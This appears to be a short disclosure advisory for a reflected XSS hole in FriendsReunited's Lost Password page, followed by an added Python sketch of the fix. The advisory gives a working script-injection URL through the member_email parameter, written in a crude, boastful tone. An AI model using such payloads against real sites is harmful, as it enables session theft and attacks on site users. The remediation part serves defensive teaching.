FriendsReunited.co.uk - XSS hole
--------------------------------

Desc: There's an XSS hole in FriendsReunited
Risk: Medium to High (can be used to include malicious code)
Discovered by : dyn0 (codeslag{hat}gmail.com)
http://0xdeadface.co.uk

Site blurb : So FriendsReunited is one of those places where people that you don't really want to talk to can hunt you down and find you.

Hole description : There's a hole in the Lost Password section

Screenshot : http://0xdeadface.co.uk/fr_xss.JPG

URL : http://www.friendsreunited.co.uk/FriendsReunited.asp
      ?wci=forgotton&member_email=%3Cscript%3Ealert(%22shoot%20the%20kids%20at%20school%22);%3C/script%3E&error=Y

You can use this hole to include code...doesn't that make you hard?

Hugs & Kisses

dyn0/codeslag

"Cops say you must refrain from smokin, drinkin' & hoppin trains" - LOC
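
Added example (not part of the original advisory, and not the site's code): a Python sketch of the fix for a reflected member_email parameter, showing the unencoded echo next to a version that validates the value and HTML-encodes it on output. The form template, the e-mail allow-list and the function names are assumptions; the sample request is constructed from the advisory's parameter names with a shorter payload.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request: the advisory's parameters with a shorter script payload.
SAMPLE_URL = ("http://www.friendsreunited.co.uk/FriendsReunited.asp"
              "?wci=forgotton&member_email=%3Cscript%3Ealert(1)%3C/script%3E&error=Y")

# Hypothetical Lost Password markup (the site's real template is not on the page).
FORM = ('<p class="error">No account found for {shown}</p>\n'
        '<input type="text" name="member_email" value="{value}">')

# Deliberately strict allow-list for e-mail shaped input (assumption, not RFC 5322).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}\.[A-Za-z]{2,}")


def member_email(url):
    """Return the percent-decoded member_email value, as the server receives it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("member_email", [""])[0]


def render_vulnerable(email):
    """Echo the parameter unencoded: the behaviour the advisory reports."""
    return FORM.format(shown=email, value=email)


def render_hardened(email, validate=True):
    """Reject non-e-mail input, then HTML-encode at the point of output."""
    if validate and not EMAIL_RE.fullmatch(email):
        email = ""  # never echo input that is not an e-mail address
    # html.escape with quote=True encodes & < > " ' so the value cannot
    # close the attribute or open a new element.
    safe = html.escape(email, quote=True)
    return FORM.format(shown=safe, value=safe)


if __name__ == "__main__":
    value = member_email(SAMPLE_URL)
    print("vulnerable:\n" + render_vulnerable(value))
    print("hardened:\n" + render_hardened(value))
    print("encoding only:\n" + render_hardened(value, validate=False))
```

Encoding at output is the control that closes the hole; the allow-list is defence in depth and keeps junk out of the form.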